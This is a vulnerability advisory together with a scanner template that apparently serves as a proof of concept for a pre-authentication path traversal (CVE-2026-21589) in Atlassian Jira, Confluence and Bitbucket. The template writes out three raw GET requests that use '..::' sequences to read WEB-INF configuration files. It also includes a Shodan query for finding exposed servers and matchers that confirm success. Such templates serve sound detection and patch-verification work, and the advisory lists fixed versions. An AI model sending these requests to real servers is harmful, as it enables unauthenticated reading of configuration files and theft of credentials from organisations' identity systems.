Atlassian products including Jira, Confluence, and Bitbucket Data Center contain a pre-authentication arbitrary file read vulnerability in the shared atlassian-plugins-webresource library. The library improperly handles double colons (::) as path separators in the resource routing, allowing unauthenticated attackers to traverse the filesystem and read arbitrary files within the application server's webroot, including sensitive configuration files such as web.xml and crowd.properties containing plaintext credentials.
PoC
id: CVE-2026-21589
info:
name: Atlassian Jira/Confluence/Bitbucket - Pre-Auth Arbitrary File Read
author: Kazgangap,DhiyaneshDk,watchtowr
severity: critical
description: |
Atlassian products including Jira, Confluence, and Bitbucket Data Center contain a pre-authentication arbitrary file read vulnerability in the shared atlassian-plugins-webresource library. The library improperly handles double colons (::) as path separators in the resource routing, allowing unauthenticated attackers to traverse the filesystem and read arbitrary files within the application server's webroot, including sensitive configuration files such as web.xml and crowd.properties containing plaintext credentials.
impact: |
An unauthenticated attacker can read arbitrary files within the Tomcat application context, including WEB-INF configuration files. When Atlassian Crowd is configured, this can leak plaintext credentials from crowd.properties, enabling full administrative access to the identity management system and all connected Atlassian products.
remediation: |
Update to the fixed versions: Jira 9.12.40/10.3.26/11.3.12, Confluence 9.2.26/10.2.19, Bitbucket 9.4.26/10.2.8/10.5.1, Bamboo 10.2.24/12.1.12, Crowd 6.3.7/7.0.3/7.1.7/7.2.4, Crucible 4.9.15, Fisheye 4.9.15.
reference:
- https://labs.watchtowr.com/you-wont-hear-about-these-even-in-myths-atlassian-jira-confluence-and-more-pre-auth-arbitrary-file-read-cve-2026-21589/
- https://nvd.nist.gov/vuln/detail/CVE-2026-21589
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-21589
epss-score: 0.01755
epss-percentile: 0.77225
cwe-id: CWE-22
metadata:
verified: true
max-request: 3
vendor: atlassian
product: jira,confluence,bitbucket
shodan-query: http.component:"Atlassian"
tags: cve,cve2026,atlassian,jira,confluence,bitbucket,lfi,path-traversal,vkev
http:
- raw:
- |
GET /download/resources/jira.webresources:color-picker-popup/images/..::..::..::..::..::WEB-INF::web.xml HTTP/1.1
Host: {{Hostname}}
- |
GET /s/1/_/download/resources/com.atlassian.confluence.plugins.dashboard-actions/images/..::..::..::..::..::..::..::..::WEB-INF::web.xml HTTP/1.1
Host: {{Hostname}}
- |
GET /s/1.0/_/download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..::..::..::..::..::WEB-INF::urlrewrite.xml HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_any(body, "<web-app", "<urlrewrite")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100e77624177ee38d86ed86cd50f7d5347662164cc0046f4f09b816eb739a91fd3702210085759a43d0c5c7646775753d7012ca1cf4a104c71608322949f433d8b7f10952:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.